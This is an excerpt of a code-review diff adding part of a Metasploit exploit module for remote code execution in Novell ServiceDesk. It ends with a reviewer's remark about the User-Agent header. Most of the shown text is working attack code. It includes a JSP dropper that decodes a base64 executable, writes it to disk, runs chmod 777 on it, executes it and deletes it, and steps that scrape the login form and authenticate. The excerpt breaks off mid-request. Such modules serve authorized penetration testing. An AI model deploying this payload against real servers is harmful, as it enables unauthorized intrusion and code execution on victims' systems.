modules/exploits/multi/http/novell_servicedesk_rce.rb

```diff
@@ -0,0 +1,384 @@
+    var_path    = Rex::Text.rand_text_alpha(rand(8) + 3)
+    var_proc2   = Rex::Text.rand_text_alpha(rand(8) + 3)
+
+    if @my_target['Platform'] == 'linux'
+      var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
+      chmod = %Q|
+      Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
+      Thread.sleep(200);
+      |
+
+      var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
+      cleanup = %Q|
+      Thread.sleep(200);
+      Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
+      |
+    else
+      chmod = ''
+      cleanup = ''
+    end
+
+    jsp = %Q|
+    <%@page import="java.io.*"%>
+    <%@page import="sun.misc.BASE64Decoder"%>
+    <%
+    try {
+      String #{var_buf} = "#{base64_exe}";
+      BASE64Decoder #{var_decoder} = new BASE64Decoder();
+      byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
+
+      File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}");
+      String #{var_path} = #{var_tmp}.getAbsolutePath();
+
+      BufferedOutputStream #{var_ostream} =
+        new BufferedOutputStream(new FileOutputStream(#{var_path}));
+      #{var_ostream}.write(#{var_raw});
+      #{var_ostream}.close();
+      #{chmod}
+      Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
+      #{cleanup}
+    } catch (Exception e) {
+    }
+    %>
+    |
+
+    jsp = jsp.gsub(/\n/, '')
+    jsp = jsp.gsub(/\t/, '')
+    jsp = jsp.gsub(/\x0d\x0a/, "")
+    jsp = jsp.gsub(/\x0a/, "")
+
+    return jsp
+  end
+
+
+  def exploit
+    version = get_version
+
+    # 1: get the cookies, the login_url and the password_form and username form names (they varies between versions)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri('/LiveTime/WebObjects/LiveTime.woa'),
+      'headers' => {
+        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
+      }
+    })
+
+    if res && res.code == 200 && res.body.to_s =~ /class\=\"login\-form\"(.*)action\=\"([\w\/\.]+)(\;jsessionid\=)*/
+      login_url = $2
+      @cookies = res.get_cookies
+      if res.body.to_s =~ /type\=\"password\" name\=\"([\w\.]+)\" \/\>/
+        password_form = $1
+      else
+        # we shouldn't hit this condition at all, this is default for v7+
+        password_form = 'password'
+      end
+      if res.body.to_s =~ /type\=\"text\" name\=\"([\w\.]+)\" \/\>/
+        username_form = $1
+      else
+        # we shouldn't hit this condition at all, this is default for v7+
+        username_form = 'username'
+      end
+    else
+      fail_with(Failure::NoAccess, "#{peer} - Failed to get the login URL.")
+    end
+
+    # 2: authenticate and get the import_url
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(login_url),
+      'headers' => {
+        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
+      },
```

Comment:
The user agent header should be removed. The send_request_cgi will select an appropriate UA automatically.